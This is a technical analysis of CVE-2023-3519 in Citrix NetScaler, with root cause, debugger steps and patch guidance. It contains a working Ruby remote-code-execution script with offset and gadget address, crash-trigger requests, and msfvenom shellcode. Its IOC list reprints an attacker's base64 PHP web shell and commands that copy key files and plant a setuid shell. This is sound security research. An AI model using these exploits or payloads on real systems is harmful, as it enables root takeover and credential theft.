Technical Analysis
Description
On Tuesday, July 18, Citrix published a security bulletin warning users of three vulnerabilities affecting NetScaler ADC and NetScaler Gateway. Of the three vulnerabilities, CVE-2023-3519, a stack-based buffer overflow, is the most severe and has been confirmed as actively exploited. Successful exploitation allows unauthenticated attackers to execute code remotely on vulnerable systems that have been configured as a gateway.
According to Citrix, the following supported versions of NetScaler ADC and NetScaler Gateway are affected by the vulnerabilities:
- NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.13
- NetScaler ADC and NetScaler Gateway 13.0 before 13.0-91.13
- NetScaler ADC and NetScaler Gateway version 12.1
- NetScaler ADC 13.1-FIPS before 13.1-37.159
- NetScaler ADC 12.1-FIPS before 12.1-65.36
- NetScaler ADC 12.1-NDcPP before 12.1-65.36
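The version ranges above can be checked mechanically. The following is a minimal sketch, assuming version strings in the `branch-build` form used in this analysis (for example `13.1-48.47`); the `affected?` helper and its lookup tables are hypothetical names introduced here, and the FIPS and NDcPP branches are deliberately left out.

```ruby
# Fixed builds for the standard branches, taken from the list above.
FIXED_BUILDS = {
  '13.1' => [49, 13],
  '13.0' => [91, 13]
}.freeze

# Branches listed as affected without a fixed build in the list above.
ALWAYS_AFFECTED = ['12.1'].freeze

# Returns true when the version falls in an affected range, false when it is
# at or above the fixed build, and nil when this sketch does not cover it.
def affected?(version)
  branch, build = version.split('-', 2)
  return true if ALWAYS_AFFECTED.include?(branch)

  fixed = FIXED_BUILDS[branch]
  return nil if fixed.nil? || build.nil?

  # Array#<=> compares element by element: [48, 47] sorts before [49, 13].
  (build.split('.').map(&:to_i) <=> fixed) == -1
end

puts affected?('13.1-48.47')
```

The version analyzed in this write-up, 13.1-48.47, sits one build below the fix and is therefore reported as affected.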
On July 21, BishopFox reported that there are about 61,000 potentially vulnerable Citrix appliances on the internet, and suggested that about 35% (21k) were vulnerable at the time.
This analysis will focus on the root cause analysis and exploitation of CVE-2023-3519 using version 13.1-48.47.
Technical analysis
History
In our first pass at analyzing the vulnerability, we noticed a change in several SAML-related functions (including ns_aaa_saml_parse_authn_request) that appeared to fix a heap-based buffer overflow when processing certain types of SAML messages. That part of the patch ultimately ended up being a red herring (or possibly an additional vulnerability that was silently patched), but it did lead us to the correct service: /netscaler/nsppe, the NetScaler Packet Parsing Engine.
On July 21, researchers at Assetnote also confirmed the existence of that same issue that we noted; we both noticed that this vulnerability didn’t exactly match the description provided by Citrix. We agreed that there was more to this vulnerability, and that instinct was confirmed when BishopFox later released a video PoC of exploitation through a different vector than the one we’d identified.
BishopFox noted:
The vulnerability that we identified is different from the one identified by Rapid7 in this AttackerKB article and by Assetnote in their analysis, which required SAML to be enabled. The vulnerability we identified only requires the device to be configured as a Gateway or AAA virtual server, and to expose a specific vulnerable route that seems to be enabled by default on some installations, but not others (we’re not yet sure what causes this variance). Given the lack of SAML requirement, we believe that this stack overflow is CVE-2023-3519, and the SAML parser bug is a separate vulnerability which was silently patched without an associated advisory.
On Monday, July 24, Assetnote published a follow-up blog that shed some additional light on the confusion around CVE-2023-3519:
In our last post we uncovered a vulnerability inside Citrix ADC and NetScaler Gateway that was in the patch fix for CVE-2023-3519. It seems that this vulnerability, while also critical, is not the one that is being exploited in the wild by threat actors.
We continued our analysis and discovered an endpoint which allowed for remote code execution without the need of any special configurations such as SAML being enabled. This vulnerability matches more closely with the description of the CVE, Citrix’s advisory and any other public research that has surfaced.
Configuration
With the new information from Assetnote in mind, we needed to configure a host to be a “gateway”, a common configuration that can be done in a few steps:
- Install the Citrix ADC software – This comes in several formats, the simplest to work with is the VMware .ovf, which we used for our analysis
- Upload a license file in the web UI – a dev/test license can be obtained from Citrix (note: requires a free account)
- Configure it as a gateway – This can be accomplished by logging into the web UI and clicking Configuration –> Citrix Gateway –> Citrix Gateway Wizard, keeping the default settings
Once it’s configured as a gateway, it will have a second IP address, which is the IP that this exploit will target.
Dynamic analysis
To assist in our analysis, it’s helpful to debug the running process. Since this appliance is implemented on top of FreeBSD, gdb is the logical choice for debugging. At times it can be a struggle to get the exact version of gdb needed for testing; in this scenario, however, gdb and gdbserver are already available:
root@ns# ls -l /usr/bin/*gdb*
-r-xr-xr-x 1 root wheel 7146736 Jun 3 07:03 /usr/bin/gdb
-r-xr-xr-x 1 root wheel 54368 Jun 3 07:03 /usr/bin/gdbserver
-r-xr-xr-x 1 root wheel 2836856 Jun 3 07:03 /usr/bin/kgdb
With gdb already available, we can go ahead and attach it to the vulnerable process to get a better understanding of the vulnerability. Attaching to a process with gdb requires knowing the PID (process identifier) of the target process. This can be obtained by using the ps aux command and looking for the nsppe process:
root@ns# ps aux | grep nsppe
root 11623 99.0 43.0 691272 689460 - RXs 16:44 12:39.03 nsppe (NSPPE-00)
In the case of our setup, the PID is 11623. When attaching to the process with gdb (gdb /netscaler/nsppe 11623), we are immediately met with a challenge. Although gdb does attach to the process successfully, almost immediately a system error message appears, which is generated outside of gdb. The message mentions a process called pitboss and indicates that it missed five “heartbeats” from the nsppe-00 process. As a result, pitboss immediately declares a “system failure” and reboots the system, killing our debug session. This is known as a “watchdog timer”, and is very common in embedded systems to ensure a return to a known good state can be achieved in a minimal amount of time.
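To make the watchdog behavior concrete, here is a small illustrative model of a heartbeat counter. It is only a sketch of the general technique: the `Watchdog` class is hypothetical, the threshold of five comes from the error message described above, and nothing here reflects how pitboss is actually implemented.

```ruby
# Hypothetical model of a heartbeat watchdog; not pitboss's actual logic.
class Watchdog
  attr_reader :missed

  def initialize(max_missed: 5)
    @max_missed = max_missed
    @missed = 0
  end

  # Call once per monitoring interval. heartbeat_seen says whether the
  # monitored process checked in during that interval.
  def tick(heartbeat_seen)
    @missed = heartbeat_seen ? 0 : @missed + 1
    @missed >= @max_missed ? :system_failure : :ok
  end
end

watchdog = Watchdog.new
# A process that is stopped in a debugger sends no heartbeats at all.
results = Array.new(5) { watchdog.tick(false) }
p results
```

In this model, a process paused under a debugger trips the failure state on the fifth missed interval, which matches the reboot observed when attaching gdb.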
In order to use gdb, we will need to disable this watchdog. There are many different approaches to accomplish this task, but the simplest is to search for a built-in mechanism to disable the timer. Since gdb is already present on the device, it is logical that there also might be a simple method to disable the timer. After searching the filesystem and with some analysis of the pitboss binary, we came across a Perl script called nspf. Luckily, this script has extensive help output:
root@ns# nspf help
Usage: '/netscaler/nspf ((<process_name> | <pid>) <action> | query)'
where <process_name> is one of:
NSPPE-00 aslearn awsconfig bgpd de
imi isisd metricscollectomonuploadd nsaaad
nsaggregatord nscfsyncd nsclfsyncd nsclusterd nsconfigd
nscopo nsfsyncd nsgslbautosyncnslcd nslped
nsm nsnetsvc nsrised nstraceaggregatnsumond
ospf6d ospfd ptpd ripd ripngd
snmpd syshealthd
'nsp query' shows the status of all processes listed above
Actions common to all processes:
'help'-> Show attributes that can be dynamically set
'pbmonitor'-> register or unregister with pitboss
value: ON or 1 or OFF or 0
[...]
Here we can see that pitboss, our software watchdog timer, can be disabled by using the pbmonitor command and passing it a value of 0 to indicate off. Once disabled, we can use gdb to continue our analysis:
root@ns# /netscaler/nspf nsppe-00 pbmonitor 0
nspf NSPPE-00 pbmonitor 0
Removing pitboss monitor on process NSPPE-00 pid 11623
The vulnerability
Assetnote’s blog calls out ns_aaa_gwtest_get_event_and_target_names as the vulnerable function. If we compare the old and new versions of the function with a tool such as bindiff, we can see a new check in the patched version that ensures a value, which turns out to be a length value, is no more than 0x7f (or 127):
c8389d: 83 fb 7f cmp ebx,0x7f
c838a0: 7e 16 jle c838b8 <ns_aaa_gwtest_get_event_and_target_names+0x2d8>
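The comparison in those two instructions can be modeled in a few lines. This is only a sketch of the arithmetic: `passes_length_check?` and `as_signed32` are hypothetical helper names, and the model says nothing about what the patched function does on either side of the branch. The one x86 detail it captures is that `jle` is a signed comparison on the 32-bit `ebx` value.

```ruby
MAX_NAME_LENGTH = 0x7f # 127, the constant compared against ebx in the patch

# Interprets a 32-bit register value as signed, the way `jle` does.
def as_signed32(value)
  value &= 0xffffffff
  value >= 0x80000000 ? value - 0x1_0000_0000 : value
end

# True when `cmp ebx,0x7f` followed by `jle` would take the branch,
# that is, when the signed value in ebx is less than or equal to 0x7f.
def passes_length_check?(length)
  as_signed32(length) <= MAX_NAME_LENGTH
end

[127, 128, 168].each do |len|
  puts "#{len}: #{passes_length_check?(len)}"
end
```

A 127-byte value satisfies the comparison, while anything from 128 bytes upward does not.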
The trick, then, is to access that function with an overly long argument. Let’s see how!
Validation
In order to trigger this vulnerability, we need to send an overly long request to the vulnerable endpoint. We can deduce the endpoint and required parameters from the binary and then create a request such as:
$ curl -k 'https://10.0.0.9/gwtest/formssso?event=start&target=AAA'
<html><body><b>Http/1.1 Internal Server Error 43549 </b></body> </html>
We can verify that we hit the vulnerable function by setting a breakpoint at the start of the vulnerable function, ns_aaa_gwtest_get_event_and_target_names, using the version of gdb that comes with the server (don’t forget to disable the watchdog if you haven’t, and don’t do this over SSH!):
root@ns# gdb /netscaler/nsppe 11623
[...]
(gdb) b ns_aaa_gwtest_get_event_and_target_names
Breakpoint 1 at 0xc82bb4
(gdb) cont
Continuing.
[...run the above curl command...]
Breakpoint 1, 0x0000000000c82bb4 in ns_aaa_gwtest_get_event_and_target_names ()
(gdb)
It does indeed break at the correct point, which means we’re hitting the vulnerable function!
Next, we validate the vulnerability by sending an overly long request:
$ curl -k 'https://10.0.0.9/gwtest/formssso?event=start&target=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
We can use gdb to verify that we did, indeed, overwrite the stack, return address and all:
root@ns# gdb /netscaler/nsppe 11623
[...]
(gdb) cont
Continuing.
[...run the curl command here...]
Program received signal SIGBUS, Bus error.
0x0000000000c7fad3 in ns_aaa_gwtest_get_valid_fsso_server ()
(gdb) x/i $rip
=> 0xc7fad3 <ns_aaa_gwtest_get_valid_fsso_server+147>: ret
(gdb) x/xwg $rsp
0x7fffffffc208: 0x4141414141414141
(gdb) backtrace
#0 0x0000000000c7fad3 in ns_aaa_gwtest_get_valid_fsso_server ()
#1 0x4141414141414141 in ?? ()
#2 0x4141414141414141 in ?? ()
#3 0x4141414141414141 in ?? ()
#4 0x4141414141414141 in ?? ()
#5 0x4141414141414141 in ?? ()
#6 0x4141414141414141 in ?? ()
#7 0x4141414141414141 in ?? ()
#8 0x4141414141414141 in ?? ()
#9 0x4141414141414141 in ?? ()
[...]
From that output, we can see that it crashed with a SIGBUS (bus error) when attempting to run a return (ret) instruction at address 0xc7fad3. The top of the stack is the value 0x4141414141414141 (or “AAAAAAAA”), which is the address that the ret instruction is trying (unsuccessfully) to return to. The backtrace of the stack shows nothing but 0x4141414141414141 values, which is what you’d expect to see in a classic stack-overflow scenario.
In addition to writing all the way up the stack, we can specifically overwrite the return address by sending the exact right amount of padding. In the example below, we will replace the return address with BBBBBBBB (0x4242424242424242). We determined this offset by guessing different offsets until it worked, but another common method would be to use Metasploit’s built-in pattern_create.rb. Our updated curl command can be sent as follows:
$ curl -k 'https://10.0.0.9/gwtest/formssso?event=start&target=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBB' curl: (56) OpenSSL SSL_read: Connection reset by peer, errno 104
After sending that request, we can observe the resulting crash in gdb (reminder that this takes down the networking stack, therefore you will need to do this via the VM console):
root@ns# gdb /netscaler/nsppe 11623
[...]
(gdb) cont
Continuing.
[...send the request...]
Program received signal SIGBUS, Bus error.
0x0000000000c7fad3 in ns_aaa_gwtest_get_valid_fsso_server ()
(gdb) x/i $rip
=> 0xc7fad3 <ns_aaa_gwtest_get_valid_fsso_server+147>: ret
(gdb) x/xwg $rsp
0x7fffffffc208: 0x4242424242424242
It crashes on a ret instruction, with 0x4242424242424242 on top of the stack this time. That means we successfully overwrote the return address with an arbitrary value!
It’s worth noting here that this executable does not have modern memory-corruption mitigations such as ASLR or DEP, which at this point are more than 20 years old. That means that memory addresses don’t change, and that we can run a payload directly from the stack. The following techniques would not work against a system that has modern security defenses enabled.
To prove that we can execute code off the stack, we need to find a jmp rsp gadget (ff e4) in the binary, which will tell the process to jump to code that is loaded onto the stack. To prove that the code actually runs, we will use a debug breakpoint (int3, which encodes to cc). If successful, this code should tell gdb to stop execution in an obvious way.
A jmp rsp gadget can be found at the address 0x6d8c62 (or, in little endian, \x62\x8c\x6d\x00\x00\x00\x00\x00); therefore we build a request with the gadget’s address, followed by a breakpoint character:
$ echo -ne 'GET /gwtest/formssso?event=start&target=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x62\x8c\x6d\x00\x00\x00\x00\x00\xcc HTTP/1.1\r\nHost: 10.0.0.9\r\n\r\n' | ncat --ssl 10.0.0.9 443
Note that we’re using echo into ncat now instead of curl, since we need to send raw binary data. curl encodes all unprintable characters, as per the HTTP standard, but due to a bug in the service’s decoder this becomes problematic for exploitation, which we will discuss in further detail below.
In our debugger, after sending that code, the breakpoint is hit as expected:
root@ns# gdb /netscaler/nsppe 11623
[...]
(gdb) cont
Continuing.
[...run the command...]
Program received signal SIGTRAP, Trace/breakpoint trap.
0x00007fffffffc211 in ?? ()
(gdb) x/i $rip-1
0x7fffffffc210: int3
This demonstrates that we can run a debug breakpoint directly from the stack, which means that we can run anything from the stack. Now we can begin real exploitation!
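As a quick sanity check on the byte order used for the gadget address earlier, the little-endian form can be reproduced with Ruby's `Array#pack`. This is a small sketch for verification only; the constant name `GADGET_ADDRESS` is introduced here for illustration.

```ruby
# Gadget address quoted in the text above.
GADGET_ADDRESS = 0x6d8c62

# 'Q<' packs an unsigned 64-bit integer in little-endian byte order.
packed = [GADGET_ADDRESS].pack('Q<')
puts packed.bytes.map { |b| format('\\x%02x', b) }.join

# Reading eight "A" bytes back as a 64-bit integer gives the value that
# gdb showed on top of the stack in the first crash.
puts format('0x%016x', ('A' * 8).unpack1('Q<'))
```

The least significant byte comes first, which is why the address appears "reversed" in the raw request.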
Exploitation
To test exploitation, we created a Ruby script that effectively wraps that ncat command from above. The HTTParty gem, which we’d typically use in this situation, won’t (easily) work because of the requirement for custom URL encoding:
# Encoding: ASCII-8bit

# To disable watchdog: nspf nsppe-00 pbmonitor 0
# The return address where we take control: 0xc7fad3

require 'base64'
require 'cgi'
require 'socket'

if ARGV[1].nil?
  puts "Usage: #{$0} <target> <payload file>"
  exit 1
end

# The URL encoding of the target is buggy, and values that start with a
# letter (in hex) cannot be URL-encoded, but certain other characters
# must be; we simply URL-encode everything below 0xa0 for simplicity
def my_encode(s)
  return s.bytes.map { |b| (b < 0xa0) ? '%%%02x' % b : b.chr }.join
end

# The amount of padding needed to overwrite the return address
RETURN_OFFSET = 168

# The offset of a simple return-to-stack gadget, packed into a little-endian
# string
JMP_ESP = [0x6d8c62].pack('Q')

# Read the payload from the file, and kinda-URIencode it
PAYLOAD = my_encode(File.read(ARGV[1]).force_encoding('ASCII-8bit'))

# Put everything together into a query string
QUERY_STRING = ('A' * RETURN_OFFSET) + JMP_ESP + PAYLOAD

# Create the full request
FULL_REQUEST = "GET /gwtest/formssso?event=start&target=#{QUERY_STRING} HTTP/1.1\r\nHost: #{ARGV[0]}\r\n\r\n"

# Wrap this in `ncat` to simplify SSL stuff
system("echo #{Base64::strict_encode64(FULL_REQUEST)} | base64 -d | ncat --ssl #{ARGV[0]} 443")

# Done?
puts "Done?"
It’s worth specifically calling out the my_encode function here. Typically, it would make sense to use the CGI::escape method to properly URL-encode the query string, but the target implements URL decoding incorrectly. If the encoded character is below 0xa0 (like %00 or %41 in a URL), it correctly decodes. But, if the encoded sequence starts with a letter such as %a0 or %ff, it will fail to decode and remains the literal string, including the % character. Since certain characters will break the request (like &), and others can’t be encoded (like %ff), in our script we encode everything below %a0 and nothing else.
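The decoding behavior described above can be illustrated with a toy model. The sketch below pairs the script's `my_encode` with `model_decode`, a hypothetical stand-in for the target's decoder that follows only the rule stated in the text (a `%XX` sequence is decoded when its first hex digit is 0-9, and is otherwise left as a literal string). It is an assumption-based model and was not derived from the binary.

```ruby
# Selective encoder from the script above: percent-encode bytes below 0xa0
# and pass everything else through raw.
def my_encode(s)
  s.bytes.map { |b| b < 0xa0 ? format('%%%02x', b) : b.chr }.join
end

# Hypothetical model of the target's decoder as described in the text:
# %XX is decoded only when the first hex digit is 0-9.
def model_decode(s)
  s.b.gsub(/%([0-9][0-9a-fA-F])/) { Regexp.last_match(1).hex.chr }
end

all_bytes = (0..255).map(&:chr).join.b

# Every byte value survives a round trip through the selective encoder.
puts model_decode(my_encode(all_bytes)).bytes == all_bytes.bytes

# A conventionally encoded high byte stays a literal three-character string.
puts model_decode('%ff') == '%ff'
```

Under this model, encoding everything below 0xa0 and sending the rest raw is the simplest scheme that delivers every byte value intact.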
Shellcode
Now that we’ve proven we can run the world’s simplest shellcode (int 3), we can try increasingly complex shellcodes! Let’s try using msfvenom to generate a basic payload for 64-bit FreeBSD systems. Fortunately for us, msfvenom has several FreeBSD payloads, including one that executes a local shell command. We can use it to create a file with the following msfvenom command:
$ msfvenom -p bsd/x64/exec CMD="/usr/bin/touch /root/foobar" > root_foobar.bin
No platform was selected, choosing Msf::Module::Platform::BSD from the payload
No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 62 bytes
This payload will simply touch the location /root/foobar, creating an empty file there whose existence we can later validate to prove that the command executed successfully. We use full paths for both the binary and the output file so we aren’t reliant on the $PATH variable.
Once we have the payload, we can use the Ruby script above to send it. We want to make sure we still have gdb attached to nsppe so we can confirm the expected result:
$ ruby cve-2023-3519-poc.rb 10.0.0.9 ./root_foobar.bin
After sending that new payload, we can examine the outcome in gdb. Using the ! syntax, it is possible to run the ls command to examine the filesystem from within gdb:
root@ns# gdb /netscaler/nsppe 11623
[...]
(gdb) cont
Continuing.
[...run the payload here...]
process 11623 is executing new program: /usr/bin/touch
[Inferior 1 (process 11623) exited normally]
(gdb) !ls
.bash_history foobar
The script successfully sends the payload, and the file /root/foobar is successfully created! If we can run one msfvenom payload, we should be able to run any msfvenom payload!
But there is one very important drawback: because this crashes nsppe, which is the networking subsystem, we cannot create a reverse shell because the server’s network is completely killed. To develop a reliable exploit, we had to find a way to avoid crashing nsppe.
Keeping nsppe Alive
To keep the nsppe process alive, we opted to use a return address that jumps back to ns_aaa_cookie_valid() (0x00782403). This address is the function’s epilogue, where it restores the values of non-volatile registers per the AMD64 ABI specification. By changing the stack pointer to a predetermined value, this epilogue can be used to restore register state and finally pass control flow to its caller, ns_aaa_client_handler(). We have control over the return value and simply set it to 0 through rax.
Now that we can execute code within nsppe, we need a way to execute a useful payload. At first we tried to use the fork() syscall; however exec() would replace the current process, which would break network communications. We also tried to use fork() to clone the process, but that would inevitably cause the process to crash. Finally, we settled on using a short assembly stub to call libc’s popen() function. This allows us to execute an OS command as root, without waiting for it to complete. Once the OS command has been started, we adjust the stack and return directly into ns_aaa_cookie_valid(). The HTTP request receives its response and our payload executes successfully.
We are currently working on a Metasploit module, which will be released in the near future!
IOCs
Mandiant reported with high confidence seeing active exploitation of CVE-2023-3519. In their report, they noticed the following behavior within POST requests:
- Copying the NetScaler configuration file ns.conf, as well as the F1 and F2 key files, into a single destination file within the /var/vpn/themes directory
- Creating a web shell, info.php, by echoing a base64-encoded string to a temporary file and then decoding it using the OpenSSL binary present on the appliance
- Copying the regular bash binary from /usr/bin/bash on the appliance and setting the setuid bit on the copy to allow easy access to root privileges
The sequence of commands Mandiant extracted from log files and core dumps was:
- cat /flash/nsconfig/ns.conf >>/var/vpn/themes/insight-new-min.js
- cat /nsconfig/.F1.key >>/var/vpn/themes/insight-new-min.js
- cat /nsconfig/.F2.key >>/var/vpn/themes/insight-new-min.js
- echo PD9waHAgDQpmb3IgKCR4PTA7ICR4PD0xOyAkeCsrKSB7DQogICAgICAgICRDWzFdID0gJF9SRVFVRVNUWyIxMjMiXTsNCiAgICAgICAgQGV2YWwNCiAgICAgICAgKCRDWyR4XS4iIik7DQp9IA0KPz4= > /tmp/cccd.debug
- openssl base64 -d < /tmp/cccd.debug > /var/vpn/themes/info.php
- cp /usr/bin/bash /var/tmp/bash
- chmod 4775 /var/tmp/bash
It is highly likely that both failed and some successful exploitation attempts will result in the nsppe process crashing and creating a core dump, which can be found under the /var/core directory on the ADC. This crash will also cause a system-wide reboot. Any unusual rebooting of an unpatched device should be considered suspicious. It’s also worth noting that this vulnerability grants remote code execution as the root user, which means that a skilled attacker can clean up and remove evidence from local log files.
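The file-based indicators above lend themselves to a simple triage check. The following is a minimal sketch, assuming Ruby is available on the analysis host; the `ioc_hits` helper is hypothetical, the paths are exactly those from the commands Mandiant listed, and the optional `root` argument is there so the check can be pointed at a mounted disk image rather than a live appliance. A clean result does not prove the absence of compromise, since an attacker with root access can remove these artifacts.

```ruby
# Paths taken from the commands listed above.
IOC_FILES = %w[
  /var/vpn/themes/insight-new-min.js
  /var/vpn/themes/info.php
  /tmp/cccd.debug
  /var/tmp/bash
].freeze

CORE_DIR = '/var/core'

# Returns a list of human-readable findings under the given root directory.
def ioc_hits(root = '/')
  hits = []

  IOC_FILES.each do |rel|
    path = File.join(root, rel)
    next unless File.exist?(path)

    note = File.stat(path).setuid? ? ' (setuid bit set)' : ''
    hits << "#{path} exists#{note}"
  end

  # Core dumps are not proof of exploitation, but they deserve a closer look.
  Dir.glob(File.join(root, CORE_DIR, '**', '*')).each do |path|
    hits << "#{path} is a core directory entry to review" if File.file?(path)
  end

  hits
end

ioc_hits.each { |hit| puts hit }
```

Any hit should be treated as a starting point for investigation, alongside the reboot and log evidence discussed above.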
Guidance
Patches are available for vulnerable versions of NetScaler ADC and NetScaler Gateway and should be applied on an emergency basis. CVE-2023-3519 and the others reported on the advisory are remediated in the following fixed product versions:
- NetScaler ADC and NetScaler Gateway 13.1-49.13 and later releases
- NetScaler ADC and NetScaler Gateway 13.0-91.13 and later releases of 13.0
- NetScaler ADC 13.1-FIPS 13.1-37.159 and later releases of 13.1-FIPS
- NetScaler ADC 12.1-FIPS 12.1-65.36 and later releases of 12.1-FIPS
- NetScaler ADC 12.1-NDcPP 12.1-65.36 and later releases of 12.1-NDcPP